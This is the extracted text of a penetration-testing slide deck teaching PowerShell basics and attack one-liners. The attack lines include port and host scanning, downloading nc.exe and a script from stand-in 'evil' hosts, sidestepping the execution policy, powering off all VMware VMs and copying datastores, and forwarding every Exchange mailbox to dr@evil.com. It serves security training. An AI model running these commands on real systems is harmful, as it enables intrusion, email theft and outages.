Tim  Medin  

  Counter  Hack  Challenges    Background  

  Pen  Tester  –  Internal,  Perimeter,  Web,  Social,  Telephony  

  Corp  Security  –  Financial  Services  

  Network  Engineer  –  Higher  Education  

  Software  Engineer  –  Manufacturing  &  Industrial  

  Control  Systems  Engineer  

  Contributions    Laudanum    CommandLineKungFu.com    Packetstan.com    Other  blogs  

  Local  DefCon  and  Security  Groups  

  CCDC    Local  Universities  

  Coolness  of  PowerShell    Basics  of  PowerShell    Quick  Command  Line  Attacks    Script  Execution    3rd  Party  CmdLets  

  CMD  is  teh sUck!!1!   Need  upgrade,  badly    Nothing  is  standard  

  Naming    Switches    Switch  operators  

 dash  v.  slash  

 Why  would  you  want  to  parse  anything?   Are  you  too  good  for  the  For  Loop!  

  Installed  by  default  on  Windows  7,  Server  2008R2,  and  later  

  Full  integration  with  Microsoft  Server  Products    Exchange    SharePoint    Active  Directory  

  Third  Party  Apps  too    VMware!  

  Full  access  to  .NET  Framework  

   In  short,  FUN!    

  Basics  of  PowerShell  

  “CmdLets”  are  quite  standard    PowerShell  Naming  Convention  

  Names  are  Verb-­‐Noun    Verbs  Standardized  by  Microsoft  ▪  Get  vs.  Read  ▪  Find  vs.  Search  

  Common  Parameter  Names    Help  

 We  don’t  have  to  parse  text!    Easily  string  together  many  commands    Easier  to  read    $_.Length    vs    cut -d' ' –f4

  Don’t  have  to  know  what  the    4th  item  in  the  output  is,  as  with  Cut  or  AWK  

  Just  like  other  shells,  but…    Objects!  

Find  files  containing  “blah”  Get-ChildItem | Select-String blah –list

Find  files  containing  “blah”…and  delete  them  Get-ChildItem | Select-String blah –list | Remove-Item

  Prefixed  with  $    Dot  access  properties  and  methods  of  an  object  

  $_    Current  Pipeline  Object      Used  in  script  blocks,  filters  (Where-­‐Object),  ForEach-­‐Object,  and  switches  

  $true    $false    $null    See  them  all  with:            Get-ChildItem variable:

PowerShell   PowerShell  Alias   CMD   *nix  

Get-­‐ChildItem   ls,  gci,  dir   dir   ls  

Copy-­‐Item   cp,  copy,  cpi   copy   cp  

Move-­‐Item   move,  mv,  mi   move   mv  

Select-­‐String   <none>   find,  findstr   grep  

Get-­‐Help   man,  help   help   man  

Get-­‐Content   cat,  gc,  type   type   cat  

 Easy!  Aliases  match  CMD  and  Bash  

  ForEach-­‐Object  (alias  %)    Operates  on  each  object  passed  down  the  pipeline,      Not  to  be  confused  with  ForEach,  a  looping  statement  

Get-ChildItem | ForEach-Object { "do something with " + $_.Name}

ls | % { "do something with " + $_.Name }

  Where-­‐Object  (alias  ?)    Used  to  filter  objects  passed  down  the  pipeline  

Get-Process | ? { $_.Modules -like "*(rsaenh.dll)*" -and $_.Modules -like "*(iphlpapi.dll)*"

-and $_.Modules -like "*(WININET.dll)*" }

  Out-­‐*    Output  to  file,  Host,  Printer,  …  

  Export-­‐CSV    Exports  object,  with  names  and  properties    Import-­‐CSV  can  read  it  back  in  

  Group-­‐Object    Groups  objects  together  based  on  properties  

  Sort-­‐Object  

  Get-­‐Member  (alias  gm)    Gets  all  the  properties  and  methods  of  an  object  type  

  Available  properties  and  Methods  on  Files      ls | gm  

  Format-­‐List  (alias  fl)    Output  the  properties  of  all  the  object  passed  down  the  pipeline,  only  “default”  properties  

  Use  *  to  see  all  the  properties      ls | fl *    

  Gets  a  list  of  commands  (DUH!)    With  no  parameters  it  lists  everything  

 -­‐Noun  <string>    -­‐Verb  <string>    -­‐Module    <string>              All  cmdlets  in  a  module              (e.g.  Exchange,  VMware,  etc.)  

 Very  useful  for  finding  the  cmdlet  you  need!    

  Can  use  it  on  aliases  too  (e.g.  ls,  mv)    Default  output  is  isn’t  really  useful    Useful  switches  

  -­‐Examples    (-­‐ex  for  short)    -­‐Full  

  Aliases    Parameters  

  Need  as  much  of  the  name  as  necessary  to  uniquely  identify  it.    ✗ ls  -­‐f    “f”  matches  Filter  &  Force    ✔  ls  -­‐fo  “fo”  only  matches  Force    ✔  ls  -­‐for  “for”  only  matches  Force  

 Works  for  CmdLets    AND  PARAMETERS!    Allows  you  to  cycle  though  matching  names  

You  complete  me!  

PS C:\> 1..1024 | % { echo ((new-object Net.Sockets.TcpClient) .Connect("10.1.1.14",$_)) "$_ is open" } 2>$null

25 is open

  Pseudo  Code  1..1024 | foreach-object { print (connection_attempt “port is open”) } Discard error message

  The  trick  PS C:\> echo (1+1) (2+2) 2 4

PS C:\> echo (1/0) (2+2) Attempt to divide by zero <-­‐  2+2  is  not  output  

PS C:\> 1..255 | % { echo ((new-object Net.Sockets.TcpClient) .Connect("10.1.1.$_",445)) "10.1.1.$_" } 2>$null

10.1.1.5

  Access  text  file  like  this  (to  stdout):  

(New-Object System.Net.WebClient) .DownloadString("http://mysite.com/myevil.ps1")

  To  save  it  a  file:  

… | Out-File –Encoding ASCII myfile.ps1  

 What  if  we  want  to  download  an  executable?  

(New-Object System.Net.WebClient) .DownloadFile( "http://mysite.com/nc.exe", "c:\nc.exe" )

…but,  we  can’t  PowerShell  with  netcat  

 Wants  a  Terminal    From  Meterpreter,  go  BOOM   What  about  a  script?  

  Default  Execution  Policy  stop  scripts    Default  mode  is  “Restricted”    Change  it  to  allow  local,  unsigned  scripts  with    Set-ExecutionPolicy RemoteSigned ▪  Changing  requires  Admin  Permissions  

  BUT…  

 Get-Help about_Execution_Policies

The  execution  policy  is  not  a  security  system  that  restricts  user  actions.  For  example,  users  can  easily  circumvent  a  policy  by  typing  the  script  contents  at  the  command  line  when  they  cannot  run  a  script.  Instead,  the  execution  policy  helps  users  to  set  basic  rules  and  prevents  them  from  violating  them  unintentionally.  

C:\temp> powershell -command ls powershell -command ls

Directory: C:\temp

Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 3/22/2012 5:10 PM 14 file2 -a--- 3/22/2012 5:10 PM 12 file3

C:\> powershell -command "(New-Object System.Net.WebClient).DownloadFile('http://evil.com/nc.exe', 'nc.exe’)"

C:\temp> powershell -command ls powershell -command ls

Directory: C:\temp

Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 3/22/2012 5:10 PM 14 file2 -a--- 3/22/2012 5:10 PM 12 file3 -a--- 3/23/2012 12:10 PM 61440 nc.exe

  Run  a  script  without  running  a  script    Uses  Encoded  Command    DefCon  18  Talk  by  Dave  Kennedy  (ReL3K)  and  Josh  Kelley  (Winfang)  

 Windump    Dump  SAM  via  PowerShell,  but  has  problems  

  Interface  to  VMware  vSphere    Extremely  Powerful!    Commands  Connect-VIServer vc1 –User tm –Password pw

Get-VM

Get-VM | Stop-VM –Confirm:$false <-­‐  Power  off  Everything  

DON’T  RUN  THIS!  

  I  want  data…data  is  on  the  servers…so  get  the  whole  server?  

$ds = Get-Datastore <datastore-name>

New-PSDrive -Name MyDS -PSProvider ViMdatastore -Root '\' -location $ds

Copy-DatastoreItem MyDS:\Fldr2\ -Destination C:\temp

  Firewall-­‐Shmirewall!    Runs  a  PowerShell  script  IN  the  guest  OS  of  each  of  the  specified  virtual  machines  

  It  does  require  credentials  to  access  the  Guest   We  can  probably  get  those  when  we  download  the  VM  

 Why  yes,  I’d  like  all  your  email  

Set-Mailbox joeuser -DeliverToMailboxAndForward:$True -ForwardingAddress dr@evil.com

 Why  yes,  I’d  like  EVERYONE’S  email  

Get-Mailbox | Set-Mailbox -DeliverToMailboxAndForward:$True -ForwardingAddress dr@evil.com

  Requires  Domain  Admin  Permissions    Providers  

  Microsoft  -­‐  Requires  one  of  the  following  ▪  Windows  2008  R2  Domain  Controller  ▪  Windows  2008  R2  Server  running  Lightweight  Directory  Services  

  Quest  –  client  only  (better  for  pen  testing)    List  all  users  in  a  pretty  CSV    Get-ADUser | Export-CSV us.csv <-­‐MS   Get-QADUser | Export-CSV us.csv <-­‐Quest  

  All  users  without  password  expirations    Get-QADUser -Enabled -PasswordNeverExpires:$true

  PowerShell  is  a  significant  upgrade  from  CMD   We  can  use  the  same  CMD  Fu,  but  it’s  easier  (albeit  more  verbose)  

  Lot’s  of  interaction  with  other  products  

  tim@counterhackchallenges.com  

 @timmedin  

  SEC  560:  Network  Penetration  Testing  Ethical  Hacking  –  Dallas,  June  18  –  23    

  SEC  504:  Hacker  Techniques,  Exploits  and  Incident  Handling  –  Raleigh,  July  16  –  21    

  Brute  for  VMware  creds  http://blog.securitywhole.com/2009/09/01/brute-­‐force-­‐esx-­‐usernamepassword.aspx  

  PowerShell,  it’s  time  to  own  http://www.secmaniac.com/files/PowerShell_Defcon.pdf  

  Command  Line  Kung  Fu  Blog  http://www.commandlinekungfu.com  

  Hey!  Scripting  Guy!  http://blogs.technet.com/b/heyscriptingguy